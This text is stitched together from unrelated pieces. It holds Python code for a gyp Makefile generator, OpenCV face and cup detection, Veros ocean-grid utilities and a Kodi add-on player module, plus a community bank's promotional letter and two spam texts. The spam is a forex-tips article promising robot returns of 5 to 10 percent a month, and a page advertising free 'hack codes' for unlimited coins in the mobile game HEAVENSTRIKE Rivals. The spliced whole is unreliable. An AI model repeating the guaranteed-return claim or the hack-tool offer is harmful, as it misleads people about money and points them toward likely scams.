'LOCAL_SHARED_LIBRARIES')
self.WriteList(
DepsToModules(link_deps, generator_default_variables['STATIC_LIB_PREFIX'], generator_default_variables['STATIC_LIB_SUFFIX']),
'LOCAL_STATIC_LIBRARIES')
if self.type == 'executable':
self.WriteLn('include $(BUILD_EXECUTABLE)')
elif self.type == 'shared_library':
self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
elif self.type == 'static_library':
self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
self.WriteLn()
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
return gyp.xcode_emulation.GetSortedXcodeEnv(self.xcode_settings, "$(abs_builddir)", os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)", additional_settings)
def GetSortedXcodePostbuildEnv(self):
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting('CHROMIUM_STRIP_SAVE_FILE', '')
# Even if strip_save_file is empty, explicitly write it. Else a postbuild
# might pick up an export from an earlier target.
return self.GetSortedXcodeEnv(additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
for k, v in env:
# For
# foo := a\ b
# the escaped space does the right thing. For
# export foo := a\ b
# it does not -- the backslash is written to the env as literal character.
# So don't escape spaces in |env[k]|.
self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v))
def Objectify(self, path):
"""Convert a path to its output directory form."""
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset)
    if '$(obj)' not in path:
path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path)
return path
def Pchify(self, path, lang):
"""Convert a prefix header path to its output directory form."""
path = self.Absolutify(path)
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' %
(self.toolset, lang))
return path
return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path)
def Absolutify(self, path):
"""Convert a subdirectory-relative path into a base-relative path.
Skips over paths that contain variables."""
if '$(' in path:
# Don't call normpath in this case, as it might collapse the
# path too aggressively if it features '..'. However it's still
# important to strip trailing slashes.
return path.rstrip('/')
return os.path.normpath(os.path.join(self.path, path))
@staticmethod
def ExpandInputRoot(template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return path
def _InstallableTargetInstallPath(self):
"""Returns the location of the final output for an installable target."""
# Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
# rely on this. Emulate this behavior for mac.
if (self.type == 'shared_library' and
(self.flavor != 'mac' or self.toolset != 'target')):
# Install all shared libs into a common directory (per toolset) for
# convenient access with LD_LIBRARY_PATH.
return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
return '$(builddir)/' + self.alias
|
Are you thinking about starting currency trading? If so, there has never been a better time than now. You probably have lots of questions on where to begin and what you ought to know, but don't stress: this article will get you up to speed. Here are some suggestions to get started trading currencies. Pick one area of expertise and learn as much about that subject as possible. Only those who can predict fluctuations in the Forex will achieve success. Start small and choose one category to become knowledgeable about, such as gold or oil, and get to know that market inside and out. When something happens that changes the economy, you will immediately understand how the Forex will shift, because you are a specialist in that field. When trading in the Forex market, you should focus on the areas with the lowest trading activity. Most investors focus on the more volatile currencies with lots of trading activity. Prices are more likely to turn in areas of low trading activity, however, because supply and demand are no longer in balance. Don't involve yourself in an unpredictable forex trade.
durability and some pledge difficult returns. If you select a good robot you can expect a return of 5 to 10 percent a month. A good forex trading suggestion is to try to discover which factors drive a particular currency. A variety of things can have a major influence on a currency, such as policy decisions and even political changes. Getting to know these factors will improve your chances of making wise decisions. Using this knowledge, you are more likely to be successful with currency trading. There is no such thing as too much knowledge. Hopefully you have found the suggestions in this article useful and are able to use them to get started trading on the forex market. Before long, you will be trading like a professional. |
import numpy as np
import itertools
import cv2
from time import sleep
import os
import math
import event
from color_matcher import ColorMatcher
from sensors.sift_matcher import SIFTMatcher
from pixels2coords import pixels2coords, get_distance_from_cup_width
def distance_between_faces(face1, face2):
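    """Euclidean distance between the centers of two (x, y, w, h) face boxes."""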
x1, y1, w1, h1 = face1
x2, y2, w2, h2 = face2
return math.sqrt((x1 + w1/2.0 - x2 - w2/2.0)**2 +
(y1 + h1/2.0 - y2 - h2/2.0)**2)
def distance_to_center(face, size=(640, 480)):
"""
    Get the distance from the center of the face's bounding box to the center
    of the image.
>>> distance_to_center((270, 200, 20, 20))
50.0
>>> distance_to_center((310, 230, 20, 20))
0.0
>>> distance_to_center((310, 230, 20, 20), (1024, 768))
240.0
"""
x, y, w, h = face
c_x, c_y = x+w/2.0, y+h/2.0
return math.sqrt((c_x - size[0]/2.0)**2+(c_y - size[1]/2.0)**2)
def common_area(face1, face2):
"""
Calculate the percentage of common area for two bounding boxes. Should be 0
for completely different bounding boxes, 1 for the same.
>>> common_area((100, 200, 300, 400), (100, 200, 300, 400))
1.0
>>> common_area((1, 2, 3, 4), (6, 7, 8, 9))
0.0
>>> common_area((100, 100, 100, 100), (150, 100, 100, 100))
0.5
>>> round(common_area((100, 100, 100, 100), (150, 100, 100, 200)), 4)
0.3333
"""
area = (face1[2]*face1[3] + face2[2]*face2[3])/2.0
left = max(face1[0], face2[0])
right = min(face1[0] + face1[2], face2[0]+face2[2])
top = max(face1[1], face2[1])
bottom = min(face1[1]+face1[3], face2[1]+face2[3])
if left < right and top < bottom:
return (right - left)*(bottom-top)/area
return 0.0
class Webcam(event.EventEmitter):
def __init__(self, ev, cam):
self.cap = cv2.VideoCapture(cam)
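        # Property ids 3 and 4 are cv2.CAP_PROP_FRAME_WIDTH and
        # cv2.CAP_PROP_FRAME_HEIGHT; request a 1280x720 capture size.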
self.cap.set(3, 1280)
self.cap.set(4, 720)
super(Webcam, self).__init__(ev)
def run(self):
while self.run_flag.is_set():
_, frame = self.cap.read()
self.emit('frame', frame)
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
sleep(0.1)
cv2.destroyAllWindows()
self.cap.release()
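# Number of consecutive frames a tracked face may go undetected before the
# detector gives up on it and starts looking for a new face.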
MAX_ITER = 15
class FaceDetector(event.DecisionMaker):
def __init__(self, ev):
self.i = MAX_ITER
# If this script doesn't work, first check if the paths to the Haar
# cascades are correct. By default they work on my computer.
# On other computers they can be overwritten by setting the env
        # variables FACE_HAAR and PROFILE_HAAR to the appropriate values.
#
self.face = None
self.face_cascade = cv2.CascadeClassifier(os.getenv('FACE_HAAR',
'haarcascades/haarcascade_frontalface_default.xml'
))
self.profile_cascade = cv2.CascadeClassifier(os.getenv('PROFILE_HAAR',
"haarcascades/haarcascade_profileface.xml"
))
super(FaceDetector, self).__init__(ev)
def frame(self, frame):
frame = cv2.resize(frame, None, fx=0.5, fy=0.5,
interpolation=cv2.INTER_AREA)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = list(self.face_cascade.detectMultiScale(gray, 1.3, 5))
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2)
if len(faces):
distances = sorted([(face, distance_to_center(face,
(1280, 1024))) for face in faces],
key=lambda x: x[0][2]*x[0][3]) # Area of face
if self.face is None:
self.face, self.d_c = distances[-1]
else:
distances.sort(key=lambda x: distance_between_faces(x[0],
self.face))
if distance_between_faces(self.face, distances[0][0]) < 50:
self.face, self.d_c = distances[0]
else:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
self.sleep(0)
cv2.imshow('faces', frame)
return
self.emit('face_pos', tuple(x*2 for x in self.face))
x, y, w, h = self.face
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.imshow('faces', frame)
self.i = MAX_ITER
elif self.face is not None:
self.emit('face_gone', self.face)
self.i -= 1
if self.i == 0:
self.face = None
cv2.imshow('faces', frame)
self.sleep(0)
class TableDetector(event.DecisionMaker):
def __init__(self, ev):
self.ev = ev
self.table_matcher = SIFTMatcher(templ='haarcascades/table.png', min_match_count=20)
super(TableDetector, self).__init__(ev)
def frame(self, frame):
height, width = frame.shape[:2]
frame = cv2.resize(frame, (3*width/4, 3*height/4))
result = self.table_matcher.find_match(frame)
if result is not None:
kp2, matchesMask, dst, good, dst_pts = result
else:
cv2.imshow('frame', frame)
self.sleep(0)
return
frame = cv2.polylines(frame,[np.int32(dst)],True, 255)
cv2.imshow('Table detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
self.emit('table_pos', dst)
self.sleep(0)
class CupDetector(event.DecisionMaker):
def __init__(self, ev, cam_angle, cup_color='pahar_mare_albastru'):
self.frames_seen = 0
self.cam_angle = cam_angle
self.cup_color = cup_color
self.blue_cup = ColorMatcher(cup_color)
self.ev = ev
super(CupDetector, self).__init__(ev)
def frame(self, frame):
big_contours = self.blue_cup.find_bboxes(frame)
contours = []
for contour in big_contours:
x, y, X, Y = contour
ratio = float(Y-y)/(X-x+1)
contours.append((x, y, X, Y, 1, 1.2))
for x, y, X, Y in big_contours:
ratio = float(Y-y)/(X-x+1)
cv2.rectangle(frame, (x-2, y-2), (X, Y), (255, 0, 0), 2)
cv2.putText(frame, '%0.3f' % ratio, (x, y+20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
coords_list = []
for x, y, X, Y, matches, ratio in contours:
cv2.rectangle(frame, (x - 2, y - 2), (X, Y), (0, 255, 0), 2)
dist = '%0.2f' % get_distance_from_cup_width(X-x)
coords = pixels2coords((x+X)/2., Y-(X-x), X-x,
cam_angle=self.cam_angle)
cv2.putText(frame, dist, (x, y-20),
cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255),
thickness=2)
cv2.putText(frame, '%0.2f %0.2f %0.2f' % coords, (x, y-50),
cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255),
thickness=2)
if x > 0 and X < frame.shape[1]:
coords_list.append(coords)
coords_list.sort()
for x, y, z in coords_list:
self.frames_seen = min(self.frames_seen + 1, 20)
if self.frames_seen == 20 and x < 400:
print 'cd: Cup appeared: %s' % self.cup_color
self.emit('cup_appeared', (x, y, z))
self.frames_seen = 0
break
#else:
#print 'cd: Cups done: %s' % self.cup_color
#self.emit('cups_done')
cv2.imshow('Cup detector', cv2.resize(frame, dsize=None,
fx=0.5, fy=0.5))
|
When I interview a candidate for any position, I always explain to them that First Liberty is a Community Bank. What does it mean to be a Community Bank? At First Liberty, we are talking primarily about two things.
First of all, First Liberty Bank strives to be an engaged and vital corporate citizen in the communities in which we are located. We provide financial services, the vast majority of which are provided to individuals and companies that are located in Greater Oklahoma City and Norman, Oklahoma, where our banking offices are located. This does not mean that we never leave these boundaries – sometimes there is a valid reason to do so. But when we are marketing our products and services and when we are calling on potential clients, we are very nearly always focused in our home communities.
We are fortunate to be in The United States of America, where we have the freedom to pursue our business opportunities. We are lucky to be in the Great State of Oklahoma, where we have abundant resources, a reasonable cost of living, and a bunch of great people. We are grateful to be in Greater Oklahoma City and Norman, both vibrant, growing communities where opportunities for success abound.
As grateful corporate citizens, we believe it is our duty to give back to our communities. We support a number of civic and charitable organizations and activities that are such a vital part of our communities and our society as a whole. We do so with our resources, but not just our financial resources. We encourage our staff members to volunteer their time and to provide leadership in organizations and causes that are near and dear to their heart.
Secondly, First Liberty Bank is a community in and of itself. We are a community of people that are striving toward a common goal. Of course, like any for-profit company, we are trying to become a highly profitable business that rewards our owners. But we want more than that.
We are working to build a community of people that will make our company special, and we ask them over and over to do three simple things: Be Kind, Be Genuine, and Bend over Backwards to Serve the Relationships we establish. Though these may seem like ‘soft’ parts of our business plan, I truly believe they are as important a part of the success we have enjoyed as any strategy we have implemented.
If you are ever in need of financial services, think Community, it’s the ONLY way to Bank!
And if you are looking for a Community Bank to open an account or pursue a career, I hope you will give First Liberty Bank a try. We will Be Kind, We will be Genuine, and We Will Bend over Backwards to serve you.
Please don't hesitate to contact me at 405.608.1903 or [email protected] if there is anything I can do for you. |
import numpy as np
import scipy.interpolate
import scipy.spatial
def interpolate(coords, var, interp_coords, missing_value=None, fill=True, kind='linear'):
"""Interpolate globally defined data to a different (regular) grid.
Arguments:
coords: Tuple of coordinate arrays for each dimension.
var (:obj:`ndarray` of dim (nx1, ..., nxd)): Variable data to interpolate.
interp_coords: Tuple of coordinate arrays to interpolate to.
missing_value (optional): Value denoting cells of missing data in ``var``.
Is replaced by `NaN` before interpolating. Defaults to `None`, which means
no replacement is taking place.
fill (bool, optional): Whether `NaN` values should be replaced by the nearest
finite value after interpolating. Defaults to ``True``.
kind (str, optional): Order of interpolation. Supported are `nearest` and
`linear` (default).
Returns:
:obj:`ndarray` containing the interpolated values on the grid spanned by
``interp_coords``.
"""
if len(coords) != len(interp_coords) or len(coords) != var.ndim:
raise ValueError('Dimensions of coordinates and values do not match')
var = np.array(var)
if missing_value is not None:
invalid_mask = np.isclose(var, missing_value)
var[invalid_mask] = np.nan
if var.ndim > 1 and coords[0].ndim == 1:
interp_grid = np.rollaxis(np.array(np.meshgrid(
*interp_coords, indexing='ij', copy=False)), 0, len(interp_coords) + 1)
else:
        interp_grid = interp_coords
var = scipy.interpolate.interpn(coords, var, interp_grid,
bounds_error=False, fill_value=np.nan, method=kind)
if fill:
var = fill_holes(var)
return var
def fill_holes(data):
"""A simple inpainting function that replaces NaN values in `data` with the
nearest finite value.
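
    Example (illustrative; exact array formatting may vary by NumPy version):
        >>> fill_holes(np.array([np.nan, 1., np.nan, np.nan, 4.]))
        array([1., 1., 1., 4., 4.])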
"""
data = data.copy()
shape = data.shape
dim = data.ndim
flag = np.zeros(shape, dtype=bool)
flag[~np.isnan(data)] = True
slcs = [slice(None)] * dim
while np.any(~flag):
for i in range(dim):
slcs1 = slcs[:]
slcs2 = slcs[:]
slcs1[i] = slice(0, -1)
slcs2[i] = slice(1, None)
slcs1 = tuple(slcs1)
slcs2 = tuple(slcs2)
# replace from the right
repmask = np.logical_and(~flag[slcs1], flag[slcs2])
data[slcs1][repmask] = data[slcs2][repmask]
flag[slcs1][repmask] = True
# replace from the left
repmask = np.logical_and(~flag[slcs2], flag[slcs1])
data[slcs2][repmask] = data[slcs1][repmask]
flag[slcs2][repmask] = True
return data
def get_periodic_interval(current_time, cycle_length, rec_spacing, n_rec):
"""Used for linear interpolation between periodic time intervals.
One common application is the interpolation of external forcings that are defined
at discrete times (e.g. one value per month of a standard year) to the current
time step.
Arguments:
current_time (float): Time to interpolate to.
cycle_length (float): Total length of one periodic cycle.
rec_spacing (float): Time spacing between each data record.
n_rec (int): Total number of records available.
Returns:
:obj:`tuple` containing (n1, f1), (n2, f2): Indices and weights for the interpolated
record array.
Example:
The following interpolates a record array ``data`` containing 12 monthly values
to the current time step:
>>> year_in_seconds = 60. * 60. * 24. * 365.
>>> current_time = 60. * 60. * 24. * 45. # mid-february
>>> print(data.shape)
(360, 180, 12)
>>> (n1, f1), (n2, f2) = get_periodic_interval(current_time, year_in_seconds, year_in_seconds / 12, 12)
>>> data_at_current_time = f1 * data[..., n1] + f2 * data[..., n2]
"""
locTime = current_time - rec_spacing * 0.5 + \
cycle_length * (2 - round(current_time / cycle_length))
tmpTime = locTime % cycle_length
tRec1 = 1 + int(tmpTime / rec_spacing)
tRec2 = 1 + tRec1 % int(n_rec)
wght2 = (tmpTime - rec_spacing * (tRec1 - 1)) / rec_spacing
wght1 = 1.0 - wght2
return (tRec1 - 1, wght1), (tRec2 - 1, wght2)
def make_cyclic(longitude, array=None, wrap=360.):
"""Create a cyclic version of a longitude array and (optionally) another array.
Arguments:
longitude (ndarray): Longitude array of shape (nlon, ...).
array (ndarray): Another array that is to be made cyclic of shape (nlon, ...).
wrap (float): Wrapping value, defaults to 360 (degrees).
Returns:
Tuple containing (cyclic_longitudes, cyclic_array) if `array` is given, otherwise
just the ndarray cyclic_longitudes of shape (2 * nlon, ...).
"""
lonsize = longitude.shape[0]
cyclic_longitudes = np.hstack((longitude[lonsize//2:, ...] - wrap, longitude, longitude[:lonsize//2, ...] + wrap))
if array is None:
return cyclic_longitudes
cyclic_array = np.hstack((array[lonsize//2:, ...], array, array[:lonsize//2, ...]))
return cyclic_longitudes, cyclic_array
def get_coastline_distance(coords, coast_mask, spherical=False, radius=None, num_candidates=None, n_jobs=-1):
"""Calculate the (approximate) distance of each water cell from the nearest coastline.
Arguments:
coords (tuple of ndarrays): Tuple containing x and y (longitude and latitude)
coordinate arrays of shape (nx, ny).
coast_mask (ndarray): Boolean mask indicating whether a cell is a land cell
(must be same shape as coordinate arrays).
spherical (bool): Use spherical instead of Cartesian coordinates.
When this is `True`, cyclical boundary conditions are used, and the
resulting distances are only approximate. Cells are pre-sorted by
Euclidean lon-lat distance, and great circle distances are calculated for
the first `num_candidates` elements. Defaults to `False`.
radius (float): Radius of spherical coordinate system. Must be given when
`spherical` is `True`.
num_candidates (int): Number of candidates to calculate great circle distances
            for each water cell. The higher this value, the more accurate the returned
distances become when `spherical` is `True`. Defaults to the square root
of the number of coastal cells.
n_jobs (int): Number of parallel jobs to determine nearest neighbors
(defaults to -1, which uses all available threads).
Returns:
:obj:`ndarray` of shape (nx, ny) indicating the distance to the nearest land
cell (0 if cell is land).
Example:
The following returns coastal distances of all T cells for a spherical Veros setup.
>>> coords = np.meshgrid(self.xt[2:-2], self.yt[2:-2], indexing='ij')
>>> dist = tools.get_coastline_distance(coords, self.kbot > 0, spherical=True, radius=self.radius)
"""
if not len(coords) == 2:
raise ValueError('coords must be lon-lat tuple')
if not all(c.shape == coast_mask.shape for c in coords):
raise ValueError('coordinates must have same shape as coastal mask')
if spherical and not radius:
raise ValueError('radius must be given for spherical coordinates')
watercoords = np.array([c[~coast_mask] for c in coords]).T
if spherical:
coastcoords = np.array(make_cyclic(coords[0][coast_mask], coords[1][coast_mask])).T
else:
coastcoords = np.array((coords[0][coast_mask], coords[1][coast_mask])).T
coast_kdtree = scipy.spatial.cKDTree(coastcoords)
distance = np.zeros(coords[0].shape)
if spherical:
def spherical_distance(coords1, coords2):
"""Calculate great circle distance from latitude and longitude"""
coords1 *= np.pi / 180.
coords2 *= np.pi / 180.
lon1, lon2, lat1, lat2 = coords1[..., 0], coords2[..., 0], coords1[..., 1], coords2[..., 1]
return radius * np.arccos(np.sin(lat1) * np.sin(lat2) + np.cos(lat1) * np.cos(lat2) * np.cos(lon1 - lon2))
if not num_candidates:
num_candidates = int(np.sqrt(np.count_nonzero(~coast_mask)))
i_nearest = coast_kdtree.query(watercoords, k=num_candidates, n_jobs=n_jobs)[1]
approx_nearest = coastcoords[i_nearest]
distance[~coast_mask] = np.min(spherical_distance(approx_nearest, watercoords[..., np.newaxis, :]), axis=-1)
else:
distance[~coast_mask] = coast_kdtree.query(watercoords, n_jobs=n_jobs)[0]
return distance
def get_uniform_grid_steps(total_length, stepsize):
"""Get uniform grid step sizes in an interval.
Arguments:
total_length (float): total length of the resulting grid
stepsize (float): grid step size
Returns:
:obj:`ndarray` of grid steps
Example:
        >>> uniform_steps = get_uniform_grid_steps(6., 0.25)
>>> uniform_steps
[ 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25,
0.25, 0.25, 0.25, 0.25, 0.25, 0.25 ]
"""
if total_length % stepsize:
raise ValueError('total length must be an integer multiple of stepsize')
return stepsize * np.ones(int(total_length / stepsize))
def get_stretched_grid_steps(n_cells, total_length, minimum_stepsize, stretching_factor=2.5,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using a hyperbolic tangent stretching function.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
minimum_stepsize (float): Grid step size on the lower end of the interval.
stretching_factor (float, optional): Coefficient of the `tanh` stretching
function. The higher this value, the more abrupt the step sizes change.
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Examples:
>>> dyt = get_stretched_grid_steps(14, 180, 5)
>>> dyt
[ 5.10517337 5.22522948 5.47813251 5.99673813 7.00386752
8.76808565 11.36450896 14.34977676 16.94620006 18.71041819
19.71754758 20.2361532 20.48905624 20.60911234]
>>> dyt.sum()
180.0
>>> dyt = get_stretched_grid_steps(14, 180, 5, stretching_factor=4.)
>>> dyt
[ 5.00526979 5.01802837 5.06155549 5.20877528 5.69251688
7.14225176 10.51307232 15.20121339 18.57203395 20.02176884
20.50551044 20.65273022 20.69625734 20.70901593]
>>> dyt.sum()
180.0
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be even integer number (given: {})'.format(n_cells))
        n_cells = n_cells // 2  # keep an integer count (matches the // used below)
stretching_function = np.tanh(stretching_factor * np.linspace(-1, 1, n_cells))
if refine_towards == 'lower':
stretching_function = stretching_function[::-1]
if two_sided_grid:
stretching_function = np.concatenate((stretching_function[::-1], stretching_function))
def normalize_sum(var, sum_value, minimum_value=0.):
if abs(var.sum()) < 1e-5:
var += 1
var *= (sum_value - len(var) * minimum_value) / var.sum()
return var + minimum_value
stretching_function = normalize_sum(stretching_function, total_length, minimum_stepsize)
assert abs(1 - np.sum(stretching_function) / total_length) < 1e-5, 'precision error'
return stretching_function
def get_vinokur_grid_steps(n_cells, total_length, lower_stepsize, upper_stepsize=None,
two_sided_grid=False, refine_towards='upper'):
"""Computes stretched grid steps for regional and global domains with either
one or two-sided stretching using Vinokur stretching.
This stretching function minimizes discretization errors on finite difference
grids.
Arguments:
n_cells (int): Number of grid points.
total_length (float): Length of the grid interval to be covered (sum of the
resulting grid steps).
lower_stepsize (float): Grid step size on the lower end of the interval.
upper_stepsize (float or ``None``, optional): Grid step size on the upper end of the interval.
If not given, the one-sided version of the algorithm is used (that enforces zero curvature
on the upper end).
two_sided_grid (bool, optional): If set to `True`, the resulting grid will be symmetrical
around the center. Defaults to `False`.
refine_towards ('upper' or 'lower', optional): The side of the interval that is to be refined.
Defaults to 'upper'.
Returns:
:obj:`ndarray` of shape `(n_cells)` containing grid steps.
Reference:
Vinokur, Marcel, On One-Dimensional Stretching Functions for Finite-Difference Calculations,
Journal of Computational Physics. 50, 215, 1983.
Examples:
>>> dyt = get_vinokur_grid_steps(14, 180, 5, two_sided_grid=True)
>>> dyt
[ 18.2451554 17.23915939 15.43744632 13.17358802 10.78720589
8.53852027 6.57892471 6.57892471 8.53852027 10.78720589
13.17358802 15.43744632 17.23915939 18.2451554 ]
>>> dyt.sum()
180.
>>> dyt = get_vinokur_grid_steps(14, 180, 5, upper_stepsize=10)
>>> dyt
[ 5.9818365 7.3645667 8.92544833 10.61326984 12.33841985
13.97292695 15.36197306 16.3485688 16.80714121 16.67536919
15.97141714 14.78881918 13.27136448 11.57887877 ]
>>> dyt.sum()
180.
"""
if refine_towards not in ('upper', 'lower'):
raise ValueError('refine_towards must be "upper" or "lower"')
if two_sided_grid:
if n_cells % 2:
raise ValueError('number of grid points must be an even integer (given: {})'.format(n_cells))
n_cells = n_cells // 2
n_cells += 1
def approximate_sinc_inverse(y):
"""Approximate inverse of sin(y) / y"""
if y < 0.26938972:
inv = np.pi * (1 - y + y**2 - (1 + np.pi**2 / 6) * y**3 + 6.794732 * y**4 - 13.205501 * y**5 + 11.726095 * y**6)
else:
ybar = 1. - y
inv = np.sqrt(6 * ybar) * (1 + .15 * ybar + 0.057321429 * ybar**2 + 0.048774238 * ybar**3 - 0.053337753 * ybar**4 + 0.075845134 * ybar**5)
assert abs(1 - np.sin(inv) / inv / y) < 1e-2, 'precision error'
return inv
def approximate_sinhc_inverse(y):
"""Approximate inverse of sinh(y) / y"""
if y < 2.7829681:
ybar = y - 1.
inv = np.sqrt(6 * ybar) * (1 - 0.15 * ybar + 0.057321429 * ybar**2 - 0.024907295 * ybar**3 + 0.0077424461 * ybar**4 - 0.0010794123 * ybar**5)
else:
v = np.log(y)
w = 1. / y - 0.028527431
inv = v + (1 + 1. / v) * np.log(2 * v) - 0.02041793 + 0.24902722 * w + 1.9496443 * w**2 - 2.6294547 * w**3 + 8.56795911 * w**4
assert abs(1 - np.sinh(inv) / inv / y) < 1e-2, 'precision error'
return inv
target_sum = total_length
if two_sided_grid:
target_sum *= .5
s0 = float(target_sum) / float(lower_stepsize * n_cells)
if upper_stepsize:
s1 = float(target_sum) / float(upper_stepsize * n_cells)
a, b = np.sqrt(s1 / s0), np.sqrt(s1 * s0)
if b > 1:
stretching_factor = approximate_sinhc_inverse(b)
stretched_grid = .5 + .5 * np.tanh(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tanh(.5 * stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(b)
stretched_grid = .5 + .5 * np.tan(stretching_factor * np.linspace(-.5, .5, n_cells)) / np.tan(.5 * stretching_factor)
stretched_grid = stretched_grid / (a + (1. - a) * stretched_grid)
else:
if s0 > 1:
stretching_factor = approximate_sinhc_inverse(s0) * .5
stretched_grid = 1 + np.tanh(stretching_factor * np.linspace(0., 1., n_cells)) / np.tanh(stretching_factor)
else:
stretching_factor = approximate_sinc_inverse(s0) * .5
stretched_grid = 1 + np.tan(stretching_factor * np.linspace(0., 1., n_cells)) / np.tan(stretching_factor)
stretched_grid_steps = np.diff(stretched_grid * target_sum)
if refine_towards == 'upper':
stretched_grid_steps = stretched_grid_steps[::-1]
if two_sided_grid:
stretched_grid_steps = np.concatenate((stretched_grid_steps[::-1], stretched_grid_steps))
assert abs(1 - np.sum(stretched_grid_steps) / total_length) < 1e-5, 'precision error'
return stretched_grid_steps
|
Hack codes for HEAVENSTRIKE Rivals: the latest version of the tool is free to download now! Our development team has released a new tool for a new way of playing HEAVENSTRIKE Rivals. With our HEAVENSTRIKE Rivals hack engine codes, players can get unlimited coins and cores on both the iOS and Android platforms. Our HEAVENSTRIKE Rivals hack codes coach has been tested on many devices, and so far no problems have been found. So if you need coins and more cores in this game quickly, you should get our HEAVENSTRIKE Rivals hack codes or function codes for help.
Enjoy a battle system designed especially for mobile devices that’s easy to learn but with deep strategic possibilities, quick-entry player-vs-player combat, and hundreds of unique characters to collect, grow and evolve.
Challenge the world and ascend the rankings until you rule over all!
Searching for Heavenstrike Rivals Hack Tool Online? |
import sys, os
import json
from traceback import print_exc
from xbmcswift2 import xbmc, xbmcgui, xbmcplugin
from meta import plugin
from meta.gui import dialogs
from meta.utils.executor import execute
from meta.utils.properties import set_property
from meta.utils.text import to_unicode, urlencode_path, apply_parameters, to_utf8
from meta.library.tools import get_movie_from_library, get_episode_from_library
from meta.navigation.base import get_icon_path, get_background_path
from meta.play.players import get_players, patch
from meta.play.channelers import get_channelers
from meta.play.lister import Lister
from settings import *
from language import get_string as _
@plugin.cached(TTL=60, cache="trakt")
def get_trakt_ids(*args, **kwargs):
try:
from trakt import trakt
return trakt.find_trakt_ids(*args, **kwargs)
except: return None
def active_players(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_PLAYERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_PLAYERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_PLAYERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_PLAYERS
elif media == "live": setting = SETTING_LIVE_ENABLED_PLAYERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_players(media, filters) if p.id in enabled]
def active_channelers(media, filters={}):
if media == "movies": setting = SETTING_MOVIES_ENABLED_CHANNELERS
elif media == "tvshows": setting = SETTING_TV_ENABLED_CHANNELERS
elif media == "musicvideos": setting = SETTING_MUSICVIDEOS_ENABLED_CHANNELERS
elif media == "music": setting = SETTING_MUSIC_ENABLED_CHANNELERS
elif media == "live": setting = SETTING_LIVE_ENABLED_CHANNELERS
else: raise Exception("invalid parameter %s" % media)
try: enabled = plugin.get_setting(setting, unicode)
except: enabled = []
return [p for p in get_channelers(media, filters) if p.id in enabled]
def action_cancel(clear_playlist=True):
if clear_playlist: xbmc.PlayList(xbmc.PLAYLIST_VIDEO).clear()
plugin.set_resolved_url()
xbmc.executebuiltin('Dialog.Close(okdialog, true)')
def action_activate(link):
xbmc.executebuiltin('Container.Update("%s")' % link)
#action_cancel()
def action_run(link):
if link.startswith("plugin://"): xbmc.executebuiltin('RunPlugin(%s)' % link)
else: xbmc.executebuiltin('RunScript(%s)' % link)
def action_prerun(link):
# xbmc.executebuiltin('ActivateWindow(10025,addons://user/xbmc.addon.video/plugin.video.zen/,return)')
if link.startswith("plugin://"):
id = link.split("/")
xbmc.executebuiltin('RunAddon(%s)' % id[2])
while xbmc.getInfoLabel('Container.PluginName') != id[2] or xbmc.getCondVisibility('Window.IsActive(busydialog)'): xbmc.sleep(250)
xbmc.sleep(250)
xbmc.executebuiltin('Container.Update("%s")' % link)
def action_play(item):
#action_cancel()
plugin.play_video(item)
def action_playmedia(item):
xbmc.executebuiltin('PlayMedia("%s")'%item)
def action_resolve(item):
#plugin.set_resolved_url(item)
action_play(item)
def get_video_link(players, params, mode, use_simple=False):
lister = Lister()
# Extend parameters
for lang, lang_params in params.items():
for key, value in lang_params.items():
if isinstance(value, basestring):
params[lang][key + "_+"] = value.replace(" ", "+")
params[lang][key + "_-"] = value.replace(" ", "-")
params[lang][key + "_escaped"] = value.replace(" ", "%2520")
